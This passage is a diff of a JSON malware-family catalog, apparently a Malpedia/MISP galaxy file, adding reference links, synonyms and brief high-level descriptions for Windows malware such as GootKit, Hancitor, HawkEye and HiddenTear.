"https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/master/Delivery/Gootkit-malware.md", + "https://www.f5.com/labs/articles/threat-intelligence/tackling-gootkit-s-traps", "https://www.youtube.com/watch?v=242Tn0IL2jE", - "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3669", - "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", - "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", + "https://www.sentinelone.com/blog/gootkit-banking-trojan-persistence-other-capabilities/", + "https://connect.ed-diamond.com/MISC/MISC-100/Analyse-du-malware-bancaire-Gootkit-et-de-ses-mecanismes-de-protection", "https://news.drweb.com/show/?i=4338&lng=en", "https://www.youtube.com/watch?v=QgUlPvEE4aw", - "https://www.cyphort.com/angler-ek-leads-to-fileless-gootkit/" + "https://securelist.com/blog/research/76433/inside-the-gootkit-cc-server/", + "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", + "http://blog.trendmicro.com/trendlabs-security-intelligence/fake-judicial-spam-leads-to-backdoor-with-fake-certificate-authority/", + "https://twitter.com/MsftSecIntel/status/1366542130731094021", + "https://www.sentinelone.com/blog/gootkit-banking-trojan-deep-dive-anti-analysis-features/", + "https://www.s21sec.com/en/blog/2016/05/reverse-engineering-gootkit/", + "https://www.us-cert.gov/ncas/alerts/TA16-336A", + "https://forums.juniper.net/t5/Security-Now/New-Gootkit-Banking-Trojan-variant-pushes-the-limits-on-evasive/ba-p/319055" ], "synonyms": [ + "Waldek", "Xswkit", "talalpek" ], @@ -8953,6 +16828,20 @@ "uuid": "329efac7-922e-4d8b-90a9-4a87c3281753", "value": "GootKit" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gophe", + "https://www.proofpoint.com/us/threat-insight/post/dyre-malware-campaigners-innovate-distribution-techniques", + "https://github.com/strictlymike/presentations/tree/master/2020/2020.02.08_BSidesHuntsville" + ], + "synonyms": [], + "type": [] + }, + "uuid": "fb2e42bf-6845-4eb3-9fe7-85a447762bce", + "value": "Gophe" + }, { "description": "", "meta": { @@ -8971,10 +16860,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi", - "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", "https://www.secureworks.com/research/gozi", - "https://lokalhost.pl/gozi_tree.txt", + "https://www.secureworks.com/research/threat-profiles/gold-swathmore", "https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007", + "http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html", + "https://github.com/mlodic/ursnif_beacon_decryptor", + "https://lokalhost.pl/gozi_tree.txt", + "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", + "https://www.youtube.com/watch?v=BcFbkjUVc7o", + "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/" ], "synonyms": [ @@ -8997,7 +16891,6 @@ "http://www.xylibox.com/2011/01/gpcode-ransomware-2010-simple-analysis.html", "http://www.zdnet.com/article/whos-behind-the-gpcode-ransomware/", "https://de.securelist.com/analysis/59479/erpresser/", - "ftp://ftp.tuwien.ac.at/languages/php/oldselfphp/internet-security/analysen/index-id-200883584.html", "https://www.symantec.com/security_response/writeup.jsp?docid=2007-071711-3132-99&tabid=2" ], "synonyms": [], @@ -9033,16 +16926,52 @@ "value": "Graftor" }, { - "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card’s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system’s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", + "description": "According to ESET Research, Grandoreirois a Latin American banking trojan targeting Brazil, Mexico, Spain and Peru. As such, it shows unusual effort by its authors to evade detection and emulation, and progress towards a modular architecture.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grandoreiro", + "https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/", + "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://securelist.com/the-tetrade-brazilian-banking-malware/97779/", + "https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks" + ], + "synonyms": [], + "type": [] + }, + "uuid": "c62219e2-74a3-49c2-a33d-0789b820c467", + "value": "Grandoreiro" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grandsteal", + "http://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "626de4fc-cfa4-4fbc-ab35-4c9ab9fdec14", + "value": "GrandSteal" + }, + { + "description": "POS malware targets systems that run physical point-of-sale device and operates by inspecting the process memory for data that matches the structure of credit card data (Track1 and Track2 data), such as the account number, expiration date, and other information stored on a card\u2019s magnetic stripe. After the cards are first scanned, the personal account number (PAN) and accompanying data sit in the point-of-sale system\u2019s memory unencrypted while the system determines where to send it for authorization. \r\nMasked as the LogMein software, the GratefulPOS malware appears to have emerged during the fall 2017 shopping season with low detection ratio according to some of the earliest detections displayed on VirusTotal. The first sample was upload in November 2017. Additionally, this malware appears to be related to the Framework POS malware, which was linked to some of the high-profile merchant breaches in the past.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grateful_pos", + "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", + "https://content.fireeye.com/m-trends/rpt-m-trends-2020", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://norfolkinfosec.com/pos-malware-used-at-fuel-pumps/", + "https://redcanary.com/blog/frameworkpos-and-the-adequate-persistent-threat/", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-fin6.pdf", - "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html", - "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season" + "https://community.rsa.com/community/products/netwitness/blog/2017/12/08/gratefulpos-credit-card-stealing-malware-just-in-time-for-the-shopping-season", + "https://usa.visa.com/dam/VCOM/global/support-legal/documents/cybercrime-groups-targeting-fuel-dispenser-merchants.pdf", + "http://www.vkremez.com/2017/12/lets-learn-reversing-grateful-point-of.html" ], "synonyms": [ "FrameworkPOS", + "SCRAPMINT", "trinity" ], "type": [] @@ -9054,8 +16983,7 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem", - "https://blogs.forcepoint.com/security-labs/mm-core-memory-backdoor-returns-bigboss-and-sillygoose" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gratem" ], "synonyms": [], "type": [] @@ -9068,6 +16996,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.gravity_rat", + "https://www.ptsecurity.com/ww-en/analytics/antisandbox-techniques/", + "https://securelist.com/gravityrat-the-spy-returns/99097/", "https://www.virusbulletin.com/blog/2018/04/gravityrat-malware-takes-your-systems-temperature/", "https://blog.talosintelligence.com/2018/04/gravityrat-two-year-evolution-of-apt.html" ], @@ -9110,10 +17040,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.grey_energy", - "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/", - "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", "https://www.eset.com/int/greyenergy-exposed/", + "https://www.secureworks.com/research/threat-profiles/iron-viking", + "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf", + "https://www.welivesecurity.com/wp-content/uploads/2018/10/ESET_GreyEnergy.pdf", "https://securelist.com/greyenergys-overlap-with-zebrocy/89506/", + "https://www.nozominetworks.com/2019/02/12/blog/greyenergy-malware-research-paper-maldoc-to-backdoor/", "https://github.com/NozomiNetworks/greyenergy-unpacker" ], "synonyms": [], @@ -9122,12 +17054,40 @@ "uuid": "5a683d4f-31a1-423e-a136-d348910ca967", "value": "GreyEnergy" }, + { + "description": "This is a proxy-aware HTTP backdoor that is implemented as a service and uses the compromised system's proxy settings to access the internet. C&C traffic is base64 encoded and the files sent to the server are compressed with aPLib.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grillmark", + "https://content.fireeye.com/m-trends/rpt-m-trends-2019", + "https://securelist.com/the-chronicles-of-the-hellsing-apt-the-empire-strikes-back/69567/" + ], + "synonyms": [ + "Hellsing Backdoor" + ], + "type": [] + }, + "uuid": "60cc0c72-e903-4dda-967a-9da0e12d4ac5", + "value": "GRILLMARK" + }, { "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok", - "https://securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grimagent", + "https://twitter.com/bryceabdo/status/1352359414746009608" + ], + "synonyms": [], + "type": [] + }, + "uuid": "57460bae-84ad-402d-8949-9103c5917703", + "value": "GRIMAGENT" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grok" ], "synonyms": [], "type": [] @@ -9135,6 +17095,20 @@ "uuid": "5ba66415-b482-44ff-8dfa-809329e0e074", "value": "GROK" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.grunt", + "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html", + "https://twitter.com/ItsReallyNick/status/1208141697282117633" + ], + "synonyms": [], + "type": [] + }, + "uuid": "884782cf-9fdc-4f3c-8fba-e878330d0ef5", + "value": "GRUNT" + }, { "description": "", "meta": { @@ -9148,6 +17122,19 @@ "uuid": "8410d208-7450-407d-b56c-e5c1ced19632", "value": "gsecdump" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.gup_proxy", + "https://www.proofpoint.com/us/threat-insight/post/lookback-malware-targets-united-states-utilities-sector-phishing-attacks" + ], + "synonyms": [], + "type": [] + }, + "uuid": "83d1bf1b-6557-4c2e-aa00-53013be73067", + "value": "GUP Proxy Tool" + }, { "description": "", "meta": { @@ -9187,12 +17174,39 @@ "uuid": "4b5914fd-25e4-4a20-b6f5-faf4b34f49e9", "value": "HackSpy" }, + { + "description": "Hakbit ransomware is written in .NET. It uploads (some) files to be encrypted to a ftp-server.\r\nThe ransom note is embedded - in earlier versions as plain string, then as base64 string. In some versions, these strings are slightly obfuscated.\r\n\r\nContact is via an email address hosted on protonmail. Hakbit (original) had hakbit@, more recent \"KiraLock\" has kiraransom@ (among others of course).\r\n\r\n", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hakbit", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://www.carbonblack.com/2020/06/15/tau-threat-analysis-relations-to-hakbit-ransomware/", + "http://id-ransomware.blogspot.com/2019/11/hakbit-ransomware.html", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", + "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", + "https://unit42.paloaltonetworks.com/thanos-ransomware/", + "https://www.proofpoint.com/us/blog/threat-insight/hakbit-ransomware-campaign-against-germany-austria-switzerland", + "https://go.recordedfuture.com/hubfs/reports/cta-2020-0610.pdf", + "https://www.seqrite.com/blog/thanos-ransomware-evading-anti-ransomware-protection-with-riplace-tactic/", + "https://www.carbonblack.com/2020/06/08/tau-threat-analysis-hakbit-ransomware/" + ], + "synonyms": [ + "Thanos Ransomware" + ], + "type": [] + }, + "uuid": "18617856-c6c4-45f8-995f-4916a1b45b05", + "value": "Hakbit" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hamweq", - "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf" + "https://blag.nullteilerfrei.de/2020/05/31/string-obfuscation-in-the-hamweq-irc-bot/", + "https://www.cert.pl/wp-content/uploads/2011/06/201106_hamweq.pdf", + "https://www.youtube.com/watch?v=JPvcLLYR0tE", + "https://www.youtube.com/watch?v=FAFuSO9oAl0" ], "synonyms": [], "type": [] @@ -9201,23 +17215,25 @@ "value": "Hamweq" }, { - "description": "", + "description": "Hancitor(aka Chanitor) emerged in 2013 which spread via social engineering techniques mainly through phishing mails embedded with malicious link and weaponized Microsoft office document contains malicious macro in it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor", - "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", + "https://twitter.com/TheDFIRReport/status/1359669513520873473", + "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/", + "https://isc.sans.edu/forums/diary/Hancitor+activity+resumes+after+a+hoilday+break/26980/", "https://researchcenter.paloaltonetworks.com/2016/08/unit42-vb-dropper-and-shellcode-for-hancitor-reveal-new-techniques-behind-uptick/", - "http://www.morphick.com/resources/lab-blog/closer-look-hancitor", + "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", "https://blog.minerva-labs.com/new-hancitor-pimp-my-downloader", "https://researchcenter.paloaltonetworks.com/2018/02/unit42-dissecting-hancitors-latest-2018-packer/", "https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html", - "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/", + "https://www.dodgethissecurity.com/2019/11/01/hancitor-evasive-new-waves-and-how-com-objects-can-use-cached-credentials-for-proxy-authentication/", + "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618", "https://www.vkremez.com/2018/11/lets-learn-in-depth-reversing-of.html", "https://www.uperesia.com/hancitor-packer-demystified", - "https://0ffset.net/reverse-engineering/malware-analysis/reversing-hancitor-again/", - "https://www.zscaler.com/blogs/research/chanitor-downloader-actively-installing-vawtrak", - "https://boozallenmts.com/resources/news/closer-look-hancitor", - "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/" + "https://www.proofpoint.com/us/threat-insight/post/hancitor-ruckguv-reappear", + "https://researchcenter.paloaltonetworks.com/2016/08/unit42-pythons-and-unicorns-and-hancitoroh-my-decoding-binaries-through-emulation/", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-compromised-servers-fraud-accounts-recent-hancitor-attacks/" ], "synonyms": [ "Chanitor" @@ -9239,6 +17255,20 @@ "uuid": "fa0ffc56-6d82-469e-b624-22882f194ce9", "value": "HappyLocker (HiddenTear?)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hardrain", + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-F.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e4948b4c-be46-44a4-81e6-3b1922448083", + "value": "HARDRAIN (Windows)" + }, { "description": "", "meta": { @@ -9260,6 +17290,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.havex_rat", + "https://pylos.co/2020/11/04/the-enigmatic-energetic-bear/", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://www.secureworks.com/research/threat-profiles/iron-liberty", "https://www.f-secure.com/weblog/archives/00002718.html" ], "synonyms": [], @@ -9269,19 +17302,41 @@ "value": "Havex RAT" }, { - "description": "", + "description": "HAWKBALL is a backdoor that attackers can use to collect information from the victim, as well as to deliver payloads. HAWKBALL is capable of surveying the host, creating a named pipe to execute native Windows commands, terminating processes, creating, deleting and uploading files, searching for files, and enumerating drives.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkball", + "https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "dc07507b-959f-4521-be0f-b9ff2b32b909", + "value": "HAWKBALL" + }, + { + "description": "HawKeye is a keylogger that is distributed since 2013. Discovered by IBM X-Force, it is currently spread over phishing campaigns targeting businesses on a worldwide scale. It is designed to steal credentials from numerous applications but, in the last observed versions, new \"loader capabilities\" have been spotted. It is sold by its development team on dark web markets and hacking forums.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkeye_keylogger", "https://blog.talosintelligence.com/2019/04/hawkeye-reborn.html", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/covid-19-cybercrime-m00nd3v-hawkeye-malware-threat-actor/", "https://cloudblogs.microsoft.com/microsoftsecure/2018/07/11/hawkeye-keylogger-reborn-v8-an-in-depth-campaign-analysis/", "https://nakedsecurity.sophos.com/2016/02/29/the-hawkeye-attack-how-cybercrooks-target-small-businesses-for-big-money/", + "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter", "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html", "http://stopmalvertising.com/malware-reports/analysis-of-the-predator-pain-keylogger.html", + "https://www.cyberbit.com/blog/endpoint-security/hawkeye-malware-keylogging-technique/", + "https://www.cyberbit.com/hawkeye-malware-keylogging-technique/", "https://www.trustwave.com/Resources/SpiderLabs-Blog/How-I-Cracked-a-Keylogger-and-Ended-Up-in-Someone-s-Inbox/", + "https://www.secureworks.com/research/threat-profiles/gold-galleon", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.govcert.ch/blog/analysis-of-an-unusual-hawkeye-sample/", + "https://www.fortinet.com/blog/threat-research/hawkeye-malware-analysis.html", "https://researchcenter.paloaltonetworks.com/2015/10/surveillance-malware-trends-tracking-predator-pain-and-hawkeye/" ], "synonyms": [ + "HawkEye", "HawkEye Reborn", "Predator Pain" ], @@ -9290,6 +17345,36 @@ "uuid": "31615066-dbff-4134-b467-d97a337b408b", "value": "HawkEye Keylogger" }, + { + "description": "HDMR is a ransomware which encrypts user files and adds a .DMR64 extension. It also drops a ransom note named: \"!!! READ THIS !!!.hta\".", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hdmr", + "http://id-ransomware.blogspot.com/2019/10/hdmr-ransomware.html", + "https://twitter.com/malwrhunterteam/status/1205096379711918080/photo/1" + ], + "synonyms": [ + "GO-SPORT" + ], + "type": [] + }, + "uuid": "d643273f-7a53-4703-bf65-95716d55a5dd", + "value": "HDMR Ransomware" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hdroot", + "https://securelist.com/i-am-hdroot-part-1/72275/", + "https://securelist.com/i-am-hdroot-part-2/72356/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "af8df5d7-cd8c-41ea-b9ec-b69ab7811e2d", + "value": "HDRoot" + }, { "description": "", "meta": { @@ -9303,14 +17388,34 @@ "uuid": "9af26655-cfba-4e02-bd10-ad1a494e0b5f", "value": "Helauto" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hellokitty", + "https://twitter.com/fwosar/status/1359167108727332868", + "https://id-ransomware.blogspot.com/2020/11/hellokitty-ransomware.html", + "https://labs.sentinelone.com/hellokitty-ransomware-lacks-stealth-but-still-strikes-home/", + "https://www.cadosecurity.com/post/punk-kitty-ransom-analysing-hellokitty-ransomware-attacks" + ], + "synonyms": [ + "KittyCrypt" + ], + "type": [] + }, + "uuid": "433c97b5-89ac-4783-a312-8bb890590ff0", + "value": "HelloKitty" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.helminth", - "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", - "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", "https://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html", + "https://blog.morphisec.com/iranian-fileless-cyberattack-on-israel-word-vulnerability", + "https://unit42.paloaltonetworks.com/dns-tunneling-in-the-wild-overview-of-oilrigs-dns-tunneling/", + "https://www.secureworks.com/research/threat-profiles/cobalt-gypsy", "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/" ], "synonyms": [], @@ -9324,8 +17429,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heloag", - "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/", - "https://www.arbornetworks.com/blog/asert/trojan-heloag-downloader-analysis/" + "https://securelist.com/heloag-has-rather-no-friends-just-a-master/29693/" ], "synonyms": [], "type": [] @@ -9351,8 +17455,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor", - "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group", - "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html" + "https://insights.sei.cmu.edu/cert/2019/03/api-hashing-tool-imagine-that.html", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/dragonfly-energy-sector-cyber-attacks", + "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group" ], "synonyms": [], "type": [] @@ -9365,8 +17470,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes", + "https://medium.com/ax1al/reversing-ryuk-eef8ffd55f12", + "https://i.blackhat.com/eu-20/Wednesday/eu-20-Rivera-From-Zero-To-Sixty-The-Story-Of-North-Koreas-Rapid-Ascent-To-Becoming-A-Global-Cyber-Superpower.pdf", "http://baesystemsai.blogspot.de/2017/10/taiwan-heist-lazarus-tools.html", - "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" + "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", + "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside", + "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/" ], "synonyms": [], "type": [] @@ -9380,6 +17489,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes_ransom", "https://blog.dcso.de/enterprise-malware-as-a-service/", + "https://www.youtube.com/watch?v=9nuo-AGg4p4", + "https://dcso.de/2019/03/18/enterprise-malware-as-a-service", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [], @@ -9416,14 +17527,38 @@ "description": "", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", - "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", - "https://twitter.com/struppigel/status/950787783353884672", - "https://github.com/goliate/hidden-tear" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddenbee", + "https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/", + "https://blog.malwarebytes.com/threat-analysis/2018/07/hidden-bee-miner-delivered-via-improved-drive-by-download-toolkit/", + "https://www.bleepingcomputer.com/news/security/new-underminer-exploit-kit-discovered-pushing-bootkits-and-coinminers/", + "https://blog.malwarebytes.com/threat-analysis/2019/05/hidden-bee-lets-go-down-the-rabbit-hole/", + "https://www.freebuf.com/column/174581.html", + "https://www.freebuf.com/column/175106.html" ], "synonyms": [], "type": [] }, + "uuid": "f1e4862e-75a3-4843-add3-726a6535019c", + "value": "Hidden Bee" + }, + { + "description": "HiddenTear is an open source ransomware developed by a Turkish programmer and later released as proof of concept on GitHub. The malware generates a local symmetric key in order to encrypt a configurable folder (/test was the default one) and it sends it to a centralized C&C server. Due to its small payload it was used as real attack vector over email phishing campaigns. Variants are still used in attacks.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hiddentear", + "https://twitter.com/struppigel/status/950787783353884672", + "https://www.bleepingcomputer.com/news/security/new-f-unicorn-ransomware-hits-italy-via-fake-covid-19-infection-map/", + "https://twitter.com/JAMESWT_MHT/status/1264828072001495041", + "https://github.com/goliate/hidden-tear", + "https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/hidden-tear-project-forbidden-fruit-is-the-sweetest/", + "https://www.slideshare.net/ChristopherDoman/open-source-malware-sharing-is-caring", + "https://dissectingmalwa.re/earn-quick-btc-with-hiddentearmp4-about-open-source-ransomware.html" + ], + "synonyms": [ + "FuckUnicorn" + ], + "type": [] + }, "uuid": "b96be762-56a0-4407-be04-fcba76c1ff29", "value": "HiddenTear" }, @@ -9433,6 +17568,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hidedrv", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "https://www.secureworks.com/research/threat-profiles/iron-twilight", "http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf" ], "synonyms": [], @@ -9441,13 +17577,60 @@ "uuid": "84b30881-00bc-4206-8170-51705a8e26b1", "value": "HideDRV" }, + { + "description": "According to FireEye, HIGHNOON is a backdoor that may consist of multiple components. The components may include a loader, a DLL, and a rootkit. Both the loader and the DLL may be dropped together, but the rootkit may be embedded in the DLL. The HIGHNOON loader may be designed to run as a Windows service.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon", + "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", + "https://twitter.com/MrDanPerez/status/1159461995013378048", + "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf", + "https://content.fireeye.com/apt-41/rpt-apt41/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f04c5821-311f-44c9-9d6c-0fe3fd3a1336", + "value": "HIGHNOON" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnoon_bin", + "https://content.fireeye.com/apt-41/rpt-apt41/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0a86eb46-28b5-4797-af63-75f9b2ef9080", + "value": "HIGHNOON.BIN" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.highnote", + "https://twitter.com/bkMSFT/status/1153994428949749761" + ], + "synonyms": [ + "ChyNode" + ], + "type": [] + }, + "uuid": "d9f03a69-507d-4b1d-af6d-e76fca5952b7", + "value": "HIGHNOTE" + }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.hikit", + "https://www.secureworks.com/research/threat-profiles/bronze-keystone", + "https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2013/hidden_lynx.pdf", "https://www.recordedfuture.com/hidden-lynx-analysis/", - "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" + "https://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware", + "https://web.archive.org/web/20141016080249/http://www.symantec.com/connect/blogs/security-vendors-take-action-against-hidden-lynx-malware" ], "synonyms": [], "type": [] @@ -9468,6 +17651,32 @@ "uuid": "ecad37b9-555a-4029-b181-6f272eed7154", "value": "himan" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.himera_loader", + "https://twitter.com/James_inthe_box/status/1260191589789392898" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b5e83cab-8096-40de-8a5b-5bf0f2e336b2", + "value": "Himera Loader" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.hisoka", + "https://unit42.paloaltonetworks.com/xhunt-campaign-attacks-on-kuwait-shipping-and-transportation-organizations/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "b6734ca0-599f-4992-9094-218d01ddfb3a", + "value": "Hisoka" + }, { "description": "", "meta": { @@ -9493,12 +17702,26 @@ "uuid": "8e056957-f28b-4b2f-bf58-6b2f7fdd7d62", "value": "HLUX" }, + { + "description": "Adware, tied to eGobbler and Nephos7 campaigns, ", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.holcus", + "https://blog.confiant.com/malvertising-made-in-china-f5081521b3f0" + ], + "synonyms": [], + "type": [] + }, + "uuid": "379356c7-ec7a-4880-85d5-afe9608d6b60", + "value": "Holcus Installer (Adware)" + }, { "description": " a 64-bit Windows password dumper/cracker that has previously been used in 